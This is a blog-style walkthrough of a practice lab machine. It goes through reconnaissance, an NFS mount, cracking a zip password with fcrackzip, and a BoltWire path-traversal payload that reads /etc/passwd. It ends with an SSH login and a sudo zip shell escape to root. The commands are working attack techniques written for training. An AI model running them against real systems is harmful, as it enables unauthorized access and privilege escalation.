This walkthrough will showcase a creative approach to gaining root access on a machine. We'll utilize an unexpected vulnerability within the zip command to escalate privileges.
After successfully setting up your dev machine, use the following details to login to the machine.
Username: root
Password: tcm
Now we need to get the IP address of the academy machine, to get that input the command:
dhclient
after that input the command:
ip a
From the above image, my IP address for academy is 192.168.59.135
Now we can ping the machine to confirm that both machines are alive and communicating.
For that we use the command:
ping 192.168.59.135 -c3
NB- your IP address would be different from mine so make sure to note your IP address and ping it.
The image above shows both machines can communicate as no packets were lost.
Next we run NMAP scan to search for open ports using the command:
nmap -p- -A 192.168.59.135
From the above scan a total of 9 ports are open, but for this lab our main targets are port 80,2049 and 8080
One of the first thing we need to do after running our scan is to visit the web page for the IP address.
NB- From our scan we have two http ports open (80 and 8080) i.e we will be visiting two web pages and the two web pages are:
192.168.59.135
and
192.168.59.135:8080
NB- Inputting 192.168.59.135:80 would give you the same result as 192.168.59.135
After much scanning of the webpages we didn't really find anything there so next we need to search if we can find some hidden web directories using *ffuf. *
To do that we open two new tabs and use the command below to search on both ports webpages:
For port 80:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.135/FUZZ
For port 8080:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.135:8080/FUZZ
While the ffuf scan is running, we can open up a new tab and work on port 2049 which is open.
Now the NFS indicated in port 2049 means network file share, so we are curious if anything is on the file share, so we need to check and to check we use the command:
showmount -e 192.168.59.135
From our search it seems there's a directory called /srv/nfs which might contain a file.
For us to be able to get the files in that directory we need to create a directory in which we would like to save the file and then we then we mount the file.
To create a directory, input the command:
mkdir /mnt/dev
To mount the file, input the command:
mount -t nfs 192.168.59.135:/srv/nfs /mnt/dev
Now we need to enter the /mnt/dev directory using the command:
cd /mnt/dev
and input the command:
ls
You should find only the save.zip file on yours, mine is showing 3 files because I have already unzipped the file.
To unzip the file, we input the command:
unzip save.zip
It is requesting for a password which we currently do not have.
There's a tool that we can use to try and see if we would be able to crack the password of the zip file, the tool is called fcrack
To install the tool on your kali, input the command:
apt install fcrackzip
I already have it installed but you might not, so after successful installation input the command:
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip
NB- -v means verbose because we want to see all the outputs
-u means we want to unzip the file
-D means we want to use a dictionary attack
-p is for the file we want to crack which is the save.zip
After running the command we can see we found a password which is java101
Now we need to unzip using the password.
Input the command:
unzip save.zip
input java101 for the password
Your file would have successfully unzipped and when you input the command *ls * you should have 3 files as seen below.
There's a txt file and an id_rsa file, first we need to check for what is inside the txt file.
To do that we input the command:
cat todo.txt
We got a message from jp
We don't know who jp is but we suspect him to be a user and we also have an id_rsa file which requires a user's details so we can SSH into it.
So we try the command:
ssh -i id_rsa jp@192.168.182.128
NB- If it asks you for a fingerprint input yes
For the password we do not know what his password is, so now we are back to square one sadly.
For now... let's move back and check our web directory search of ffuf.
So for port 80:
The lines without the # and with a status of 301 were the successful found directory.
So for port 80 six web directories were found, which are:
-public
-src
-app
-vendor
-extensions
-server-status
and for port 8080:
Two were found which are:
-dev
-server-status
So to check for the web directory for 8080 we go to our web browser and input:
http://192.168.182.128:8080/dev
NB- you might have noticed that my machine IP address might have changed, that's because I switched PC, so feel free to follow along unconfused.
So we are taken to a boltwire page, I can see a register sign on the web page so I ended up registering with the username and password of hacker
So feel free to register and use any detail of your choice.
Now I move to the port 80 web directory and input the details found from ffuf.
After much enumeration, the web directory that stood out for me was the:
http://192.168.182.128/app
Click on the config/ directory found on the web page
Now click on the config.yml file to download the file
After downloading the file, open the file
We found a username of bolt and password I_love_java
So I tried SSH using the username and password and it was still unsuccessful
So next I went back to the bolt website which I registered as hacker
and went to google to search for boltwire exploit.
Found the one below and clicked on the webpage
To use this exploit we need to be authenticated, which we are because we already created an account with details of the hacker.
So the next step is to copy the input
index.php?p=action.search&action=../../../../../../../etc/passwd
and input it into our registered boltwire hacker website.
Our website looked like this
So after copying the details from the exploit page we input it to make it look like this:
So input the command on your webpage:
http://192.168.182.128:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
NB- remember to change the IP address to your machine's IP address.
Registered users of the machine was displayed and the one which stood out for us was JP
So jp is registered as jeanpaul.
So now we ssh into the id_rsa file using the command:
ssh -i id_rsa jeanpaul@192.168.182.128
and for the password I tried using the I_love_java as the password
IT WAS SUCCESSFUL.
So now I input the command:
sudo -l
So as to find out what sudo privilege we have
And luckily we found out that we can use the command zip as a super user without having to provide a password for it.
The next step now is to find out how we can use the zip command we are given to elevate our privilege and become the root user.
For that we search google and search for gtfobins
Click on the webpage found above
Click on sudo from the web page
Scroll down, find zip and click on sudo
It will take you to the page as seen below
copy the following commands and input in the terminal logged in as jeanpaul
TF=$(mktemp -u)
Now input the command:
sudo zip $TF /etc/hosts -T -TT 'sh #'
We have successfully popped a shell.
Now input the command:
whoami
To find out which shell we popped
We have successfully become the root user.
Machine successfully exploited!
In conclusion, this walkthrough has demonstrated the potential danger of seemingly insignificant privileges. By exploiting an overpowered zip command, we were able to escalate access from a low-level user to a super user, highlighting the importance of thorough security assessments and the ever-present risk associated with privilege creep.
Top comments (2)
Interesting keep pushing
Thanks 😊